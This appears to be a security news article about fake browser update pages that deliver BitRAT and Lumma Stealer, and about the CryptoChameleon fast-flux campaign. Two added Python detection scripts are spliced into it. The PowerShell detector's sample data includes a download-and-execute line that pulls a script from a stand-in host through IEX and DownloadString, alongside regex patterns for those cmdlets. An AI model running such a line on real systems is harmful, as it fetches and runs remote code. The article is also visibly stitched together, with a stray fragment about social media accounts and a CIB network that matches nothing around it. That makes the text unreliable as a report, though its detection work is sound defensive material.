Beware: Fake Browser Updates Deliver BitRAT and Lumma Stealer Malware
Fake web browser updates are being used to deliver remote access trojans (RATs) and information stealer malware such as BitRAT and Lumma Stealer (aka LummaC2).
"Fake browser updates have been responsible for numerous malware infections, including those of the well-known SocGholish malware," cybersecurity firm eSentire said in a new report. "In April 2024, we observed FakeBat being distributed via similar fake update mechanisms."
The attack chain commences when a prospective target visits a booby-trapped website containing JavaScript code that redirects users to a bogus browser update page ("chatgpt-app[.]cloud").
The redirect page embeds a download link to a ZIP archive ("Update.zip") hosted on Discord, which is downloaded automatically to the victim's device.
It's worth pointing out that threat actors frequently abuse Discord to host and distribute payloads: a recent Bitdefender analysis uncovered more than 50,000 dangerous links spreading malware, phishing campaigns, and spam over the past six months.
"Upon execution, the PowerShell code performs multiple functions, including clearing the DNS cache, displaying a message box, downloading further PowerShell code, and installing 'LummaC2' malware," the company said.
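One way to hunt for the behaviour combination described in that quote, as an added example that is neither eSentire's code nor anything recovered from the malware: it scores PowerShell script-block logging records (Event ID 4104) by how many of the four behaviours appear together, after first reassembling the numbered fragments Windows writes for long scripts, since matching each fragment on its own can miss the combination. The cmdlet patterns, the alert threshold and the sample events are assumptions and constructed data; the report excerpt does not name the commands the script used.

```python
"""Added example: score PowerShell 4104 script-block records for the behaviour
combination described in the eSentire quote. The regexes, threshold and sample
events are assumptions; the excerpt does not name the cmdlets the malware used."""
import re
from collections import defaultdict

# Behaviour categories from the quote -> assumed PowerShell spellings of each.
BEHAVIOURS = {
    "clear_dns_cache": re.compile(r"Clear-DnsClientCache|ipconfig(\.exe)?\s+/flushdns", re.I),
    "message_box": re.compile(r"MessageBox\]::Show|\.Popup\(", re.I),
    "remote_download": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b", re.I),
    "dynamic_execution": re.compile(r"Invoke-Expression|\biex\b", re.I),
}
ALERT_THRESHOLD = 3  # assumed: any three of the four behaviours seen together


def analyze_script_block(text: str) -> dict:
    """Return which behaviour categories a (reassembled) script block exhibits."""
    matched = sorted(name for name, rx in BEHAVIOURS.items() if rx.search(text))
    return {"matched": matched, "score": len(matched), "alert": len(matched) >= ALERT_THRESHOLD}


def reassemble(events: list[dict]) -> dict[str, str]:
    """Join fragmented 4104 records per ScriptBlockId.

    Windows splits long script blocks into MessageNumber/MessageTotal chunks;
    matching each chunk alone can miss behaviours that only co-occur across chunks.
    """
    parts = defaultdict(dict)
    for e in events:
        parts[e["ScriptBlockId"]][int(e["MessageNumber"])] = e["ScriptBlockText"]
    return {sbid: "".join(chunks[n] for n in sorted(chunks)) for sbid, chunks in parts.items()}


def scan_events(events: list[dict]) -> dict[str, dict]:
    """Reassemble, then score every script block; keyed by ScriptBlockId."""
    return {sbid: analyze_script_block(text) for sbid, text in reassemble(events).items()}


# Constructed sample records shaped like Microsoft-Windows-PowerShell/Operational 4104 fields.
SAMPLE_EVENTS = [
    {"ScriptBlockId": "sb-mal", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "Clear-DnsClientCache\nAdd-Type -AssemblyName System.Windows.Forms\n"
                        "[System.Windows.Forms.MessageBox]::Show('Browser update installed')\n"},
    {"ScriptBlockId": "sb-mal", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": "$c = New-Object Net.WebClient\n"
                        "IEX $c.DownloadString('http://stage.invalid/next.ps1')\n"},
    {"ScriptBlockId": "sb-admin", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Clear-DnsClientCache\nGet-DnsClientCache | Select-Object -First 5\n"},
    {"ScriptBlockId": "sb-dl", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Invoke-WebRequest -Uri 'https://pkg.invalid/agent.zip' -OutFile 'C:\\Temp\\agent.zip'\n"
                        "Expand-Archive 'C:\\Temp\\agent.zip' 'C:\\Temp\\agent'\n"},
]

if __name__ == "__main__":
    for sbid, result in scan_events(SAMPLE_EVENTS).items():
        print(sbid, result)
```

Each fragment of the constructed malicious block scores only 2 on its own (cache flush plus message box, then download plus IEX); only the reassembled block reaches the threshold, which is the point of joining chunks before matching. The admin and package-download samples each hit a single category and stay below it.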
According to information shared by the cybersecurity firm, Lumma Stealer emerged as one of the most prevalent information stealers in 2023, alongside RedLine and Raccoon.
"The number of LummaC2-obtained logs listed for sale increased by 110% from Q3 to Q4 2023," it noted. "LummaC2's rising popularity among adversaries is likely due to its high success rate, which refers to its effectiveness in successfully infiltrating systems and exfiltrating sensitive data without detection."
The development comes as the AhnLab Security Intelligence Center (ASEC) disclosed details of a new campaign that employs webhards (short for web hard drive) as a conduit to distribute malicious installers for adult games and cracked versions of Microsoft Office and ultimately deploy a variety of malware such as Orcus RAT, XMRig miner, 3proxy, and XWorm.
Similar attack chains involving websites offering pirated software have led to the deployment of malware loaders like PrivateLoader and TaskLoader, which are both offered as a pay-per-install (PPI) service for other cybercriminals to deliver their own payloads.
It also follows new findings from Silent Push about CryptoChameleon's "almost exclusive use" of DNSPod[.]com nameservers to support its phishing kit architecture. DNSPod, part of the Chinese company Tencent, has a history of providing services for malicious bulletproof hosting operators.
"CryptoChameleon uses DNSPod nameservers to engage in fast flux evasion techniques that allow threat actors to quickly cycle through large amounts of IPs linked to a single domain name," the company said.
"Fast flux allows CryptoChameleon infrastructure to evade traditional countermeasures, and significantly reduces the operational value of legacy point-in-time IOCs."
using at least seven primary social media accounts and a CIB network of more than 250 accounts.
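To make that last point concrete, here is an added example (not Silent Push's tooling) that scores a domain's A-record observations for fast-flux behaviour: many distinct IPs, spread across many /16 prefixes, returned with short TTLs. The /16 check keeps a CDN pool that lives inside one provider range from tripping it. It also reports what fraction of answers a single point-in-time IP indicator would still match, which is why such indicators lose value against a fluxing domain. Thresholds, the .invalid domain names and the observations are assumptions and constructed data.

```python
"""Added example: a fast-flux heuristic over passive-DNS style A-record observations.
Not Silent Push's method; thresholds and sample records are assumed/constructed."""
from collections import defaultdict
from dataclasses import dataclass
import ipaddress
import statistics


@dataclass(frozen=True)
class DnsObservation:
    ts: int       # unix time the answer was observed
    domain: str
    ip: str       # A record returned
    ttl: int      # TTL of that answer, seconds


# Assumed thresholds; tune against your own baseline of CDN-fronted domains.
MIN_DISTINCT_IPS = 8
MIN_DISTINCT_PREFIXES = 4   # distinct /16 networks, so one provider's pool does not trip it
MAX_MEAN_TTL = 300          # seconds


def summarize(obs: list) -> dict:
    """Churn statistics for one domain's observations."""
    ips = {o.ip for o in obs}
    prefixes = {ipaddress.ip_network(f"{o.ip}/16", strict=False) for o in obs}
    span_hours = max(1.0, (max(o.ts for o in obs) - min(o.ts for o in obs)) / 3600)
    first_ip = min(obs, key=lambda o: o.ts).ip
    return {
        "distinct_ips": len(ips),
        "distinct_prefixes": len(prefixes),
        "mean_ttl": statistics.mean([o.ttl for o in obs]),
        "ips_per_hour": len(ips) / span_hours,
        # Share of answers a point-in-time IP IOC (the first IP seen) would still match.
        "first_ip_coverage": sum(o.ip == first_ip for o in obs) / len(obs),
    }


def is_fast_flux(stats: dict) -> bool:
    return (stats["distinct_ips"] >= MIN_DISTINCT_IPS
            and stats["distinct_prefixes"] >= MIN_DISTINCT_PREFIXES
            and stats["mean_ttl"] <= MAX_MEAN_TTL)


def classify(observations: list) -> dict:
    """Group observations by domain and attach a fast_flux verdict to each summary."""
    by_domain = defaultdict(list)
    for o in observations:
        by_domain[o.domain].append(o)
    out = {}
    for domain, obs in by_domain.items():
        stats = summarize(obs)
        stats["fast_flux"] = is_fast_flux(stats)
        out[domain] = stats
    return out


def build_sample() -> list:
    """Constructed data: 12 answers per domain, one every five minutes."""
    base = 1_700_000_000
    obs = []
    for i in range(12):
        ts = base + 300 * i
        # Fluxing domain: a fresh IP in a fresh /16 each time, 60 s TTL.
        obs.append(DnsObservation(ts, "flux-sample.invalid",
                                  f"{100 + i}.{7 * i + 1}.{13 * i + 1}.{3 * i + 1}", 60))
        # CDN-like domain: many IPs, but all within one provider /24 (TEST-NET-3).
        obs.append(DnsObservation(ts, "cdn-sample.invalid", f"203.0.113.{10 + i % 8}", 60))
        # Static domain: two round-robin IPs (TEST-NET-2), long TTL.
        obs.append(DnsObservation(ts, "static-sample.invalid", f"198.51.100.{10 + i % 2}", 3600))
    return obs


if __name__ == "__main__":
    for domain, stats in classify(build_sample()).items():
        print(domain, stats)
```

On the constructed data only the fluxing domain is flagged, and the first IP seen for it matches one answer in twelve, whereas the static domain's first IP still covers half of its answers. In practice, pair the churn score with the nameserver pivot the report describes (domains parked on the same authoritative NS set), since the nameserver is the stable element of an otherwise fluxing setup.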